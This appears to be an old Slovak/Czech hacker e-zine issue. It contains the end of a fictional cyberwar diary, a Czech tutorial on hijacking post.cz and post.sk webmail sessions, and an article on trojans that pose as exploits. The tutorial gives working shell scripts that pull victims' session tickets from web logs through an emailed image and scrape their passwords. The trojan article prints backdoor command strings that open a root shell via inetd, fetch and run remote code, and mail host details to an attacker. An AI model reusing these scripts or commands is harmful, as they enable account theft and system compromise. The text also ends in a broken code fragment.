nahrata v kabule toho dna z inej pasky ktora bola prehrata cez mobilny telefon.
kabul! aspon vieme s kym mame do cinenia...


analyza talusovho hlasu ukazala, ze je generovany pocitacom pomocou popularneho
freewaroveho programu.


zap! uvadza, ze hackerske zdroje "s urcitostou" potvrdili, ze nejaku ucast v pfw
maju aj rusi. moj pohlad na vec je, ze hackerske zdroje malokedy vedia nieco
urcite. v tomto nazore sa connie a ja rozchadzame. specificke tvrdenie bolo, ze
rusi pouzivali cali kartel ako clonu, ktora im mala zabezpecit krytie. oficialne
vyhlasenie americkej vlady via nyt:

"dokazy spajajuce rusko s cybervojnou su len nepriame a su bezvyznamne proti
opakovanym ponukam spoluprace v boji proti pfw z ruskej strany."


ale tak isto mozme byt pred tretou svetovou vojnou...doriti...


tiez na zape!:

"online nation vyhlasili, ze pfw je pokus vladnych spionaznych agentur ich
zdiskreditovat. za posledne dva roky stupenci online nation tvrdo bojovali za
uznanie statutu naroda v kyberpriestore."


statut zahrna danovu ulavu od platby americkej dane z prijmu, pretoze ako tvrdia
"zijeme prevazne v kyberpriestore". je fakt, ze online-aci nemaju v sucasnosti
pred nicim respekt.


27 jul, 07:36 edt


analyza dat priniesla bohate dokazy o tom, ze rusko a cina boli zapletene - ak
priamo nestali za - do utokov a pouzili tak cali kartel ako i azijske kriminalne
organizacie iba ako krytie. nakoniec teda cina! informacie ziskane od zajatcov
zo spratly, vsetko malajzijci cinskeho povodu, suhlasia s vysledkami nasej
analyzy.


naokolo sa povrava, ze zajatci zo spratly boli podrobeni najpokrocilejsim
vypocuvacim technikam. pekny sposob, ako povedat, ze im usmazili mozgy
vselijakymi drogami a bohviecim este. prehlasenia, ktore urobili, potvrdili, ze
bojujeme proti cinsko-ruskemu konzorciu. genaral vreeland navrol to, co sa
vsetci bali co i len vyslovit. nuklearny utok proti jednej vybranej sovietskej
zakladni ako varovanie - potom padnu k zemi, nemaju dostatok jadrovych zbrani,
aby mohli utok opetovat, tvrdil. mckay a ja sme na neho zdesne hladeli - este
viac nas sokovalo, ze ostatni tento jeho navrh zobrali vazne.


nastastie prezidentka s odporom vzdychla a povedala:

"hladas sud pusneho prachu na hasenie cigariet, vreeland?"

"pozrite, nakopme ich do riti za tu facku do tvare"
zahlasil mckay "ale urobime
to jackovou metodou."

vsetci na mna upreli svoje pohlady. sef nsa so zuzenymy ocami. stale mi
nedoverovali a jedine prezidentkina neoblomnost ma udrzala v hre.

"mozme na kybervojnu odpovedat kybervojnou"
povedal som.

prezidentka k tomu znepokojene dodala:

"mozno. ale to moze byt tak isto provokativne ako jadrova bomba."


zacala rozpravat o sankciach a ja som si iba rezignovane povzdychol. ale mckay
a ja sme sa rozhodli pracovat na kontingencnom plane kybervojny a ministri
vnutra a obrany nas v tom podporili.


27 jul, 11:17 edt


prisiel email:

"prezidentka schvalila plan excommu, navzdory tomu, ze cina a rusko nadalej
odmietali ucast na utokoch proti spojenym statom."


zatial sa americania loguju na siet, komunikuju s ruskymi a cinskymi obyvatelmi
siete cez email a s ostatnymi cez fax. snazia sa ich presvedcit, aby bojovali
proti studenej vojne, ktoru sa snazia viest ich vlady. uvidime, ci je internet
tak mocny.


pre mna bolo uzasne ako sa vojsko spolieha na udaje zo zap! sajtov. ako som
spomenul, maju vzdy najlepsie informacie ako prvi. zvycajne vojenska rozviedka
len potvrdi fakty. maju 25 surferov zamestnanych na plny uvazok, ktori citaju
vsetky sajty.


bol som na polceste do vypoctoveho strediska, ked som zazrel ministerku vnutra
(clenku excommu) ako s cervena v tvari reve na nejakeho podriadeneho, ze
myslienka obcanov pokusajucich sa ukoncit vojnu moze len "vystupnovat uz
existujucu krizu, ktora potrebuje uz len male stuchnutie aby prerastla do
nuklearnej vojny".


tuzil som jej povedat, ze jej reci stoja za hovno ale nemalo by to vyznam. ona
ani vlada nema ziadnu realnu moc nad sietou - a to je sila siete.


27 jul, 13:45 edt


armada spojenych statov sa horuckovito pripravuje na svoju odvetnu kampan,
operaciu cyberlord (ktorej info-bojove aspekty nazvali digitalnou burkou).
plan zavisi na rychlej reakcii jednotiek rychleho nasadenia (8-10 vojakov).
tito zautocia a fyzicky znicia utocnicke hniezda, umiestnene mimo uzemia ciny
a ruska. vreeland mal zase nejake sialene plany s bombardovanim oboch krajin,
ale nastastie mu to nepreslo.


jeden z mojich jobov pre mckaya bolo obhajit pouzitie malych jednotiek pred
excommom. argumentoval som, ze menej je viac. cim mensie jednotky, tym viacej
ich moze byt nasadenych v akcii.


na zaklade dat pozbieranych z predchadzajucich utokov, zo zap! sajtov a od
rukojemnikov, americka rozviedka bola schopna potvrdit a fyzicky zamerat 13
operacnych centier v utocnej sieti pfw. vsetky su mimo uzemia ruska a ciny,
vacsina na spornej pode, tak ako stanoviste v spratley. na vsetky sa zautoci
v uvodnych hodinach protiofenzivy.


prezidentka konecne odsuhlasila vojenske utoky. tieto utoky su pripravene tak,
aby sa mohla popriet americka ucast na nich, cim sa tato cast vojny zachova
"studenou", na druhej strane, operacia digitalna burka by mala prebehnut takou
silou, ze prinuti pfw skoncit tuto cybervojnu.


naproti opatrnym utokom pfw proti spojenym statom, americka ucast na cybervojne
bude rychla a rozsiahla - druh vojny, ktory opisal historik russell weigley ako
- "americky sposob vojny".


1 august bol stanoveny na prvy den protiofenzivy.


01 august, 16:50 edt


vsetci mame pochybnosti o protiofenzive. moze viest k nuklearnej vymene. zoberte
si krajinu frustrovanu cybervojnou. ked si myslia, ze padnu tak ci tak, mozno
stlacia odpalovacie tlacidlo. ale, samozrejme, nemozem sediet na zadku a nechat
ich pustat nam zilou az do smrti - smrti na nasledky tisica bodnuti. tu
zeleznica, tam mesto, mozno par jumbojetov s pasaziermi, az pokym sa nezruti
ekonomika... a mozno skoncime s destabilizaciou a vojenskym prevratom.


na obavy je neskoro. uz sme sa rozhodli.


laurie sa nakoniec ozvala. je ok! v detroite bola nejaka strasna evakuacia.
vojaci, vojenske autobusy... je zvlastne, ze sme o tom nepoculi. ale teraz su
spravy plne inych veci.


operacia cyberlord bola zahajena dnes rano pechotou americkych specialnych sil
a v rovnakom case ako zacal utok, skolabovali energeticke siete ruska a ciny.


potrubia v oboch krajinach boli poskodene, avsak guang zhou daily sajt oznamil,
ze boli schopni zabranit totalnej prirodnej katastrofe len vdaka hrdinskym
zasahom pracovnikov, ktori manualne uzavreli cely sektor - a potom ztlmili
priboj ropy, ktora uz vytiekla.


utok spojenych statov sa rozrastol na kyberutoky na rusky a cinsky financny
sektor, cim sposobil totalny chaos v oboch statoch. v obidvoch pripadoch bol
pouzity modifikovany morrissov cerv - s velkym uspechom. tento osobitny utocny
nastroj, ktory umoznuje nekonecnu replikaciu a generovanie nezmyselneho kodu,
vychrlil obrovske mnozstva dat na stare ruske unixove mainframy, ktore sa este
stale pouzivaju.


ruske a cinske dopravne, financne a energeticke systemy boli odstavene, co
sposobilo nekalkulovatelnu ekonomicku skodu a predbezne spravy hovoria, ze
straty na zivotoch boli vacsie ako v spojenych statoch na zaciatku konfliktu.


stale si opakujem: "oni to zacali, oni to zacali..."


01 august, 23:31 edt


kyberutoky na usa sa obnovili a tentokrat boli zamerane na financny sektor.
avsak, ako tvrdi wall street journal toto je najlepsie chranena oblast americkej
infosfery. kazde utocne hniezdo je rychlo zamerane specialnymi jednotkami
a zneskodnene.


02 august, 09:01 edt


bol som v bufete v pentagone, jedol som sendvic a prezeral som si spravy nasich
utokov, ked zem pod mojimi nohami akoby nadskocila. dole pod nami prebiehali
explozie. v rovnakom case som zacul obrovsky rachot. svetla na moment zhasli,
o chvilu naskocil zalozny zdroj.


pomyslel som si: "tak uz je to tu. prehrialo sa to, atomova vojna..."


vybehol som do haly, tak ako ostatni z bufetu. ozbrojeny vojaci po nas hulakali,
aby sme isli do podzemia po poziarnych schodoch. bezal som do svojej kancelarie,
schmatol som laptop a utekal za ostatnymi pod zem. uz neboli badatelne ziadne
vybuchy. rozsirili sa chyry, ze vybuch nebol nuklearny. bol to druh emp bomby.
predstavte si masivnu mikrovlnnu pecku - v plnej intenzite. vonku je totalny
chaos. ludia zhoreli. niektori s napoly uvarenymi mozgami, blabotali. auta sa
zastavili na ulici - elektronika zhorela - blokujuc policajne a zachranarske
vozy. bolo to otrasne.


02 august, 09:46 edt


moj laptop prestal fungovat - dnes pisem na kus papiera. dam si to do mojich
zaloznych poznamok, ked si zozeniem novy.


poslali ma do nemocnice na kontrolu, len pre istotu. vyzera to tak, ze som v
poriadku.


pretoze ziadna elektronika v budove nefungovala, chvilu trvalo zistit, ze
mikrovlnna megabomba vybuchla nedaleko vchodu do pentagonu od rieky. tak ako
variant emp bomby bola navrhnuta na uprazenie telekomunikacneho vybavenia, ako
aj personalu v blizkosti. a to aj spravila. toto bol zjavny pokus knokautovat
informacne bojove centrum usa. ale kybervojna bola riadena z velmi hlbokeho
podzemia a iba par povrchovych komunikacnych liniek bolo znicenych. zbytok
pentagonu bol aj tak pekne zapeceny. myslite, ze boli tieneni? nie...


najvecsi uder schytali ludia na parkovisku pri vchode. inzinieri tvrdia, ze
predbezne vypocty ukazuju, ze to bola najsilnejsia mikrovlnna bomba, aku kedy
videli.


02 august, 22:46 edt


spat v mojej kancelarii, ktora je relativne neposkodena. prezidentka zavelila
odvetu, ale stale pod ruskom tajnosti. utok na ruske zakladne v kaliningrade,
a na cinske komunikacne centrum v beihai.


03 august, 11:05 edt


ziadne dalsie bombove utoky na us zakladne. nikde. vela ludi z excommu to berie
ako tichy dokaz, ze v podstate bojujeme tretiu svetovu - proti cine a rusku -
a ze nemaju dost silny zaludok alebo vedomosti na udrzanie takehoto konfliktu.
ja si myslim, ze cina a rusko planuju posunut celu vojnu do inej urovne...
pretoze vedia, ze prezidentka je zdrahava. a mozno, ze nie je a prave v tom je
hrozba. rozmyslam ako connie. (a kde vlastne je? ziadna odpoved na email. to sa
na nu nepodoba)


rusko a cina pokracuju v popierani ucasti na vojne a ukazuju obvinujuci prst na
spojene staty. matne hrozia moznostou jadroveho vyvrcholenia.


prezidentka, ktorej rating sa akosi ustalil, sa drzi dobre. citi ze vyhrava
kybervojnu a ze nikto nepouzije atomovu bombu ako prvy. je na horucej linke s
moskvou a s pekingom a presviedca ich, ze spojene staty nemaju nic spolocne s
tymi utokmi. jeden priatel spomenul, ze povedala lebedovi:

"vsetci sme obete."


co ine mohla povedat?


04 august, 16:18 edt


prave ked sa zdalo, ze nuklearna kriza je zdarne zazehnana a ako i polne tak i
kyber operacie sa vyvijaju pre nas priaznivo, vojnove usilie dostalo bolestny
uder - z vnutra. od opozicie prezidentkinej politiky.


dnes komisia vedcov cez informatiku priliala benzin do ohna protestom obyvatelov
siete uverejnenim informacii na zap! sajte, dokazujuc, ze spojene staty, napriek
svojim verejnym vyhlaseniam, su zapojene do kybervojny proti rusku a cine.


musim uznat, ze som hlboko sklamany tymto vyvojom, i ked respektujem hlad
obyvatelov siete po informaciach. vyhlasenie komisie o tajnej kybervojne
vyvolalo nepokoj uz po niekolkych hodinach. je to vo vsetkych spravach, vsade.
a myslim naozaj vsade. titulok na zape!: "verejnost ziada okamzite ukoncenie
hackovania!"


ako oznamili najnovsie spravy, drviva vacsina amikov nechce byt ani najmensou
sucastou v rozsiahlej, extremne narusajucej tajnej vojne. prieskumy verejnej
mienky jasne ukazali, ze verenost je proti neviditelnej vojne, ktora sa dotyka
ich domovov, narusa dopravu, financnu bezpecnost a ich vlastne zivoty.
prezidentkin rating prudko klesol.


bude dost tazke pokracovat. nemam ani potuchy, co mckay urobi. dnes sa nekonala
ziadna tlacovka.


04. august, 23:51 edt


od mckaya som pocul, ze prezidentka, ktora sa obrnila a zacala ist vsetkymi
sposobmi proti rusom a cinanom, bola roztrasena a zaskocena masivnymi
elektronickymi protestmi proti kybernetickej vojne. fakt, ze americania
vynuchali jej tajnu operaciu cyberlord, ju vystrasil. pytala sa protestujucich:

"snad nechcete vyvolat skutocnu vojnu? jezisikriste, oni si neuvedomuju, ze
tato 'studena vojna' je cesta, ktorou sa veci v informacnom veku uberaju - a je
to tak lepsie!"


"hej,"
zasupil sa mckay. "to predsa nestaci. preco...niektorym ludom by mohli
chybat ich oblubene programiky!"
krcovito sa rozrehotal na plne usta. znelo to
ako nieco, co prave vymyslel. kazdopadne bolo jasne, co mame robit - co najskor
ukoncit operaciu cyberlord.


mam strach, ze nas cis a jej kamarati mozu dotlacit az k nuklearnej vojne! ak
mame obstat v skuske, i napriek pochybam, ako je trebars identita naseho
nepriatela, teraz sme na tahu my.


mckay bol namorny kapitan, takze som obhajoval svoj pripad pomocou analogie
s lamacmi kodu. ktori pomahali lovit u-booty v druhej svetovej. niekedy sa
zavesili na zachyteny signal povolujuci utok na konvoj - v nadeji, ze by vlcia
svorka mohla byt v spojeni s velenim dostatocne dlho, aby ziskali kluc k
nemeckemu kodu sifrovacieho zariadenia enigma. to okrem ineho znamenalo, ze
nacuvali volanie konvoja o pomoc, az pokym zufala bitka neskoncila a nemohli
podniknut ziadne kroky veduce k startu lietadiel zo sprievodnych lodi a utoku
na nemecke ponorky. spinavy obchod. to je koniec-koncov vo vojne normalne.


v jednej z najriskantnejsich operacii vojny velitelstvo informacneho boja
docasne oslabilo ochranu jadrovej elektrarne v diablo kanyon. bola vybrana,
pretoze sme v poslednych par dnoch detekovali niekolko pokusov o infiltraciu
do ovladacich systemov elektrarne, avsak neboli sme schopni identifikovat
utocnika. dufali sme, ze ziskame dostatok casu an jeho vystopovanie, predtym,
nez utok zarazime.


nechce sa mi ani pomysliet, co by sa stalo, keby sme boli prilis pomali. connie
na to stale myslela. pozrite kam ju to dostalo. ivars mi hovoril, ze ju zabasli.


05 august, 12:36 edt


utok skutocne prisiel. ani nie po hodine a pol po oslabeni ochrany. bol zamerany
na centralny riadiaci system vo forme obrovskej logickej bomby, alebo, ako sa
jej obycajne hovori kvoli jej destrukcnej vlastnosti - i-bomby. dovolili sme
utocnikovi prielom do systemu bez akychkolvek zabran.


utok prebiehal nasledovne: hacker pomocou brute force utoku nasiel heslo ku
klucovym kontrolnym systemom. potom, ako sa dostal dnu ako obycajny pracovnik
elektrarne, mal obmedzeny pristup k beznym ovladacim prvkom. nechali sme ho
pracovat, pokym sme nevystopovali, odkial je pripojeny...


zdrzanie medzi jednotlivymi obrannymi krokmi zposobilo, ze i-bomba stihla
ciastocne vybuchnut. avsak podarilo sa nam zamedzit obrovskym kaskadovitym
efektom, ktore by sprevadzali "cisty" vybuch. vysledok pasce bol, ze sa
chovanie reaktora priblizilo ku kritickym hodnotam. silny pobrezny vietor
rozfukal lahko radioaktivny mrak na uzemie obyvane skoro milionom ludi.


inak sa nic nestalo.


vacsina z nich pravdepodobne aj tak neumrie priamo kvoli tomu. viac ich zomrie
na detsku leukemiu. inak sa nic nestalo. inak sa nic nestalo. pripijam si na:
"inak sa nic nestalo!"


05 august, 18:45 edt


vysledna identifikacia, ktoru velitelstvo informacneho boja ziskalo
nedobrovolnou obetou v diablo canyon dala excommu a prezidentke slusnu istotu,
ze za kyberneticou vojnou nestoji rusko ani cina.


aj napriek tomu, ze kartel cali a azijske triady sa vojny zucastnili, bolo
centrum utoku na reaktor zamerane v problemovej abchazskej republike. odtial,
ako ukazovla analyza trafficu, islo od zaciatku vojny najviac komunikacie do...
severnej koreje. sialenec v severnej korei bol tretim hracom.


ked bola prezidentka oboznamena s tymito informaciami na schodzi excommu,
povedala nam, ze vazni pri vysluchu priznali, ze boli nastrceni a instruovani
tak, aby to hodili na rusov a cinanov. ako dlho to nsa a im podobne skupiny
vedeli? chcel niekto z nich konflikt s cinou a ruskom - napriek tomu, ze
vedeli, ze to pravdepodobne islo zo severnej koreje? mal by som o tom vobec
pisat? (nepustili ma, aby som videl connie, ktora je zatvorena, co ma sralo
najviac - v dc.)


podla vodcu vaznov, mala vojna vyvolat konflikt medzi veducimi velmocami,
triady by ziskali vyhodu dlhej studenej vojny, behom ktorej by ziskalo kontrolu
nad transpacifickym obchodom. ako legalnym, tak nezakonnym. ano, severna korea
chcela byt spolupachatelom ale bolo tu vela malych statov: vietnam, irak, lybia,
ktore vsetky velke mocnosti nenavideli a zaroven sa ich bali. to bol hlavny
dovod, preco bola kyberneticka vojna vymyslena. mala ich postavit proti sebe
navzajom, podla slov vaznov, "ako zuriacich vlkov". potom by svet mohol byt
bezpecnejsi, ako by sa vplyv mocnosti zmensoval - pokym by nezmizol uplne -
a mohlo sa stat, ze lup by isiel k vitazom.


na mckayove odporucanie prezidentka vydala okamzity prikaz zastavujuci
kyberneticke utoky na rusko a cinu. prostrednictvom diplomatickych kanalov
sa nepriamo ospravedlnila. velmi, velmi nepriamo...a to tak, aby sa to dalo
lahko popriet, keby sa to dostalo na verejnost. v tej istej dobe dala prikaz
specialnym jednotkam k utoku na centrum v abchazsku. pripravy zacali ihned.
utok bol naplanovany na zajtrajsie rano. dalsie prikaz uviedol do bojovej
pohotovosti nase jednotky v korei.


06 august, 19:22 edt


operacia roland bola zahajena prienikom do abchazska, udernou jednotkou
zostavenou z dvoch ciat seal a jedneho a-teamu specialneho nasadenia.


takto to verejnost miluje: bezpecne v zamori, krasne a ciste. zabijanie nie je
vidiet, pokial zrovna necumite do bedne.


pre nepriatelske velitelstvo bol utok takmer dokonalym prikladom momentu
prekvapenia (konecne). aj napriek tomu, ze boli obrancovia dost a dobre
vyzbrojeni, stanica bola obsadena, dokonca s takmer neposkodenym vybavenim.
dvanast nasich vojakov bolo zabitych ale ziadne americke programy, feny,
chladnicky ani interenety neboli poskodene. sakra, uspech, nie?


prve reakcie z ruska a ciny neboli odsudzujuce. jasne naznacovali tuzbu po
ukludneni situacie. nechceli ani nuklearnu vojnu, ani dlhy boj v skutocnej
kybernetickej vojne. obe velmoci podnikli urcite zastrene kroky ohladne pomoci
usa v povojnovej obnove. prezidentka mala, ako som pocul, vycitky svedomia.
slubila pomoc v obove ruskej a cinskej informacnej infrastruktury. vsetka
pomoc, ako inak, bol apodmienena spolupracou pri stopovani medzinarodnych
zlocincov a teroristov, ktori stali v pozadi tejto vojny. a specificku cinsku
vypomoc pri potlacani korejskych tuzob.


07 august, 13:38 edt


v poslednom prejave americkemu ludu a svetu volala prezidentka po okamzitom
ukonceni hackovania a nicenia. americke sily, ktore sa zucastnili operacie
cyberlord boli rozpustene. povedala amikom, ze velka kyberneticka vojna bola
zinscenovana niekolkymi "medzinarodnymi zlocineckymi organizaciami" v spojeni
s niektorymi statmi ("s kolkymi presne, to sa asi nikdy s istotou nedozvieme",
poznamenala). divim sa, kto jej to napisal. dodala, ze pfw boli definitivne
zmeteni z povrchu zemskeho a ze velka kyberneticka vojna mala uzitocny vedlajsi
efekt. a to, ze pomohla k vyhre v drogoej vojne - teraz, ked su kartely tak
oslabene. prihodila este poznamky, ze "rusko, cina a nasi spojenci z nato, boli
urceni k skonceniu hrozby kybernetickej vojny, bojovnych statov, kriminalnikov
a teroristov." a vsetci suhlasili so sankciami voci korei. vobec nespomenula
radioaktivny mrak.


za zape! (ktory ma dnes cez 12 milionov pristupov denne a bol odkupeny time
warner), spolocnost vedcov cez informatiku komentovala prezidentkinu rec drsnou
kritikou a pozadovala aby zaplatila svoju drahu a nevyhlasenu tajnu vojnu proti
rusku a cine. na tlacovke prezidentka komentar odmietla a hovorila o "case
ozdravenia".


na poslednom stretnuti excommu sme sa dozvedeli, ze prezidentka podpisala
zahajenie operacie cain - plan sabotazi v severnej korei. mali sa uskutocnit
v priebehu niekolkych nasledujucich mesiacov a sposobit kolaps rezimu v
pchjong-jangu, aby mohlo dojst k zovuzjednoteniu poloostrova.


31 august, 17:47 pdt


uz tyzdne neboli detekovane ziadne nepriatelske utoky.


pfw - nejaki "skutocni" lameri - boli velmi blizko tomu, aby rozputali
celosvetovu vojnu, v ktorej by sa velmoci znicili navzajom. a rovnako ako sme
sa my naucili, ako sa mame branit a ako viest protiutoky, tak i oni sa museli
naucit novu taktiku - taktiku, ktoru proti nam skor ci neskor znovu pouziju,
ked budu mat vhodnejsiu prilezitost.


12 september, 08:26 pdt


hovoril som s mckayom o connie a ivarsovi - povedal, ze u zich pustili! tajne
sluzby sa zjavne snazili dostat ich za mreze ale nepodarilo sa im to. ale...
connyina rodina vravi, ze ona a ivars "odisli do undergroundu... spolu".
nehovoril som s nimi a tak neviem, preco sa tak radikalizovali. mozno je to
nutna pretvarka. ale mohli odist, pretoze vedeli, ze budu stale sledovani.
connie vedela prilis vela a mala na veci "zly" nazor. dufam, ze vyklzla nsa.
nestaram sa, na ktorej zasranej strane je.


operacia cain bola odhalena a potlacena. plan bol postnuty na zap! asi pred
tyzdnom. tento incident nevyhnutelne musel ztazit snahy o "vycistenie" severnej
koreje.


12 jun 2003, 13:02 pdt


ubehly mesiace a stale nikto z bojovnikov velkej kybernetickej vojny nepriznal
svoju plnu ucast. stale sme iba banda deciek s dosiroka otvorenymi ocami,
mykajuci ramenami a volajuci: "to som nebol ja, mami!"


spojene staty vedu s ruskou a cinskou podporou kampan na zakaz a zmluvne
zavazky ohladne prveho pouzitia kybernetickych zbrani. ale divil by som sa,
keby taka zaruka mala nejaky vyznam.


a samozrejme, ze akykolvek zakaz kybernetickej vojny ratifikovany spojenymi
narodmi ma minimalny vyznam pre lotrov, teroristov a kriminalne siete, ktori
predovsetkym sposobili velku kyberneticku vojnu. velitelstvo informacneho boja
sledovalo kroky podniknute jednotlivymi velmocami pri hladani sluzieb tychto
kybernetickych bojovnikov. kazdy chcel zohnat najdrsnejsieho typka. mozno, ze
sme mali najviac cigariet na rozdavanie, pretoze nase odpovede odstartovali
preteky v preplacani ich sluzieb... obchod ako vzdy. ale nic pre mna.


zacinam nenavidiet ludsku spolocnost - a ja naozaj nechcem byt cynicky ohladne
ludi. potrebujem nejaku cestu von. musim sa nejako obrnit, vypnut pocitac
a vypnut mozog. dnes som poslal spravu mckayovi. informoval som ho ohladne mojho
umyslu vratit sa spat do namornej postgradualnej skoly. ukoncil som ju citatom
z poslednej reci nacelnika josepha z nez perce: "pocuvaj ma, moje srdce je chore
a smutne. odo dnesneho dna uz nikdy nebudem bojovat."


(koniec)


date: sat, 17 nov 2003 22:05:42 -0500
to: calvin tucker
from: gregg lanam
subject: *naozajstna* pravda za kybernetickou vojnou??
x-uidl: 9c1fdfd6ff5abf1beb6e98e1dc4ac845


hej calvin, prave som nasiel tuto binarku na alt.conspiracy. je to nejaka
zlozka. anonymny post od niekoho, kto vravi, ze jeho kamarat to vytiahol zo
suboru nejakeho vojaka. nieco ako novy druh hacku. hovori tomu fish. budes
potrebovat acrobat, aby si si to precital, ma to hrozne vela zvuku a video
sekvencii.


a pocuj, v nedelu vecer som to tak nemyslel, iba som zartoval. co si myslis
o tomto? myslim, ci je to naozaj pravda, je niekto prekvapeny, ze sme zase
klamali? ako obvykle, clenovia vlady drzia pri sebe. - gregg



prielom(at)hysteria.sk


navrat na obsah





.cz a .sk free mail servery



nuze, zde mame podrobnosti o security bugu ceskych a slovenskych freemail
serveru. je to uz stare (underground.cz to zverejnil nekdy v listopadu) a
servery to maji fixnute, ale piseme o tom, abyste videli co se vsechno s
webmaily da delat... muzete si to vyzkouset i na jinejch serverech. btw post.cz
a post.sk bylo derave minimalne 1 rok, odchytil jsem tim stovky hesel a uzil
jsem si srandy kopec :)


ted si vysvetlime, jak to fungovalo. k overeni platnosti uzivatele se
pouzival retezec nejakych znaku uvedeny v URL, takzvany ticket. v praxi se
tenhle ticket casto generuje z udaju o klientu pri prihlaseni, treba se
vezme adresa, username a cas a cele se to zasifruje md5sumem. kdyz se
prihlasite ke svemu uctu, vidite, ze adresa serveru je slozena z vic casti,
treba:
http://www.post.cz/login.asp?id=45cf33ac1a2a65df. hodnota promenne id
je prave ten autentifikacni ticket o ktery nam jde a ktery obsahuje
zasifrovane udaje o uzivateli. protoze post a podobne servery nekontrolovaly
soucasne pouziti jednoho ticketu z vice adres, staci ziskat obsah ticketu a
muzeme se vesele prihlasit jako nekdo jiny.


jak ovsem ziskat cizi ticket? velice jednoduse: pokud se trochu vyznate v
http protokolu, vite urcite, ze adresa predchozi stranky se odesila na
server v promenne HTTP_REFERER. webmastri diky tomu vidi odkud prichazeji
navstevnici jejich stranek. a proc to trochu nezneuzit? uzivateli, jehoz
heslo chcete zjistit, poslete do schranky html kod s obrazkem z vaseho
serveru. az se na nej podiva, obrazek se natahne a uzivateluv browser vam na
oplatku posle predchozi adresu - prave to
http://www.post.cz/neco?id=ticket. ale pozor, je zde jeste jeden
zadrhel. cizi ticket, ktery se prave zapsal do vasich logu, se da pouzit jen
po omezenou dobu, napriklad 15 minut - po x minutach neaktivity je uzivatel z
bezpecnostnich duvodu odhlasen a ticket je neplatny. takze musime pospichat.


opet nas z problemu vytahne nas genialni unix, kde jdou s pomoci
skriptovacich jazyku delat kouzla. napiseme si skript, ktery bude sam hlidat
logy a pokud tam najde novy ticket, sam se okamzite prihlasi a tim obejde
bezpecnostni lhutu. cele to mame jeste ulehcene naprostou stupiditou systemu
zmeny hesla u serveru post.cz a post.sk - ani nepotrebujete znat predchozi
heslo, a navic je stare heslo napsano v plaintextu v html kodu stranky s
nastavenim. takze nas skript nepotrebuje nic jineho, nez se prihlasit na
dane konto, jit na stranku s nastavenim a precist si tam heslo.


a zde jsou programy na odposlech hesel z post.cz a post.sk, verim, ze pro
ostatni derave servery byste je dokazali upravit sami (opakuju, ze to nema
cenu, chyby jsou uz opraveny!):



$ cat gettickets
#!/bin/sh

if [ ! -f log ]; then
touch log.old
else
mv -f log log.old
fi

cat /var/log/httpd/access_log
| grep "post.cz/mview.asp"
| awk -F"?id=" '{print $2}'
| awk -F"&" '{print $1}'
| awk -F""" '{print $1}'
> log

for ticket in `diff -u log.old log | grep "^+" | grep -v "+++" |
awk -F"+" '{print $2}'`; do
./getpassword $ticket | grep -v "unknown" >> post.log
done



$ cat getpassword
#!/bin/sh

netcat="/usr/bin/nc"
timeout=20

if [ ! $1 ]; then
echo "Pouziti: $0 "
exit 1
fi

log=".tmp.${RANDOM}"
trap "rm -f $log" 0 9 15

(
echo "GET /uprefs.asp?id=${1} HTTP/1.1"
echo "Host: www.post.cz"
echo "Connection: close"
echo
)
| $netcat -w $timeout www.post.cz 80 > $log

login=`cat $log | grep -iE ">.*@post.cz" '{print $3}'`
heslo=`cat $log | grep -iE "input.*name=overeni.*value=" |
awk -F "VALUE="" '{print $2}' | awk -F" '{print $1}'`

if [ -z "$login" ]; then
login="unknown"
fi

if [ -z "$heslo" ]; then
heslo="unknown"
fi

echo "$login:$heslo"


program gettickets se dal do crontabu na kazdou minutu. sve obeti jste
poslal mail s obrazkem ze sveho serveru. nejpozdeji jednu minutu pote, co si
obet mail precetla, jste meli jeji jmeno a heslo v souboru post.log.



newroot, newroot(at)hysteria.sk


navrat na obsah





trojske kone v exploitoch



uz v minulosti, i ked sporadicky, sa zacali objavovat v roznych konferenciach
zameranych na bezpecnost trojske kone, ktore sa maskuju za exploity napr. na
rozne rozsirene sietove daemony ako sshd, apache/httpd a podobne. v poslednej
dobe sa s podobnymi zalezitostami akoby roztrhlo vrece. takyto trojsky kon nie
je prilis zlozite napisat, i ked tie, ktore sa mi dostali do ruk boli roznej
kvality. najdolezitejsie je, aby sa rozsirili medzi co najvacsi pocet nic
netusiacich uzivatelov. je v tom aj cosi social engineeringu. dostat podobny
trojan do obehu si vyzaduje trochu zrucnosti a hlavne stastia. idealnym sposobom
su napriklad posty do konferencii alebo vytvorenie webstranky s "exploitmi".
aby si autor zabezpecil, ze obet mo naozaj poskytne idealne prostredie, obvykle
byva podmienkou spustat program s pravami administratora. samotny trik spociva
v tom, ze shellcode obsahuje seriu prikazov, ktore vytvoria jednoduchy backdoor
a daju vediet autorovi a i ked to na prvy pohlad vyzera, ze sa shellcode posiela
kamsi na cielovy host, vykona sa na lokalnej masine. zbytok programu plni len
maskovaciu ulohu, odvadza pozornost. a kdesi cosi medzi spletou kopirovania
bufferov, ktore sa aj tak vobec nevyuziju, testovanim moznosti vytvorenia
sietoveho spojenia a ineho balastu okolo, vylezie z utrob nasho dreveneho konika
nebezpecne ozbrene vojsko.


shellcody mozu vyzerat napriklad takto:


(shellcode_1):


cp /etc/inetd.conf /tmp/;(cat /etc/inetd.conf;echo "31337 stream tcp nowait
root /bin/bash bash -i")>/etc/inetd.conf;killall -HUP inetd;mv /tmp/inetd.conf
/etc/;echo "`whoami`@`hostname -i`"| mail on@niekde.tam.sk

(shellcode_2):

`which lynx` -dump niekde.sk/backdoor.c>/tmp/backdoor.c;gcc -o /tmp/backdoor
/tmp/backdoor.c;/tmp/backdoor;rm -f /tmp/backdoor*;echo "`whoami`@`hostname -i"|
mail on@niekde.tam.sk

pripadne preco si hned neposlat aj /etc/passwd a /etc/shadow? fantazii sa medze
nekladu. videl som aj jeden dost stupidny a nie prilis dobre napisany trojan. v
jeho shellcode sa nachadzalo toto:


(shellcode_3):


echo>>/etc/profile;cc -o httpd httpd.c;rm httpd.c;mv httpd /dev/;/dev/httpd;
echo /dev/httpd>>/etc/profile;cat /etc/hosts | mail niekto@niekde.cz

pricom httpd.c si generoval pri spusteni trojskeho kona. prilis viditelne a dost
neefektivne. rad by som vedel, ako by sa tvaril, keby v /etc/hosts bol zapisany
iba localhost ako to byva po default instalacii. :)) velmi nedostacujuce na
jednoznacnu identifikaciu hosta. hostname -i je vhodna nahrada.


aby seria prikazov nebola napadna a zaroven sa podobala typickym shellcodom
znamym z roznych exploitov, konvertuje sa do hexadecimalneho tvaru. pri spusteni
su znaky interpretovane korektne. tuto konverziu je mozne docielit jednoduchym
programom v jazyku c:


h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sck < 0) {
printf("Error: Can't open socket.n");
exit(1);
}

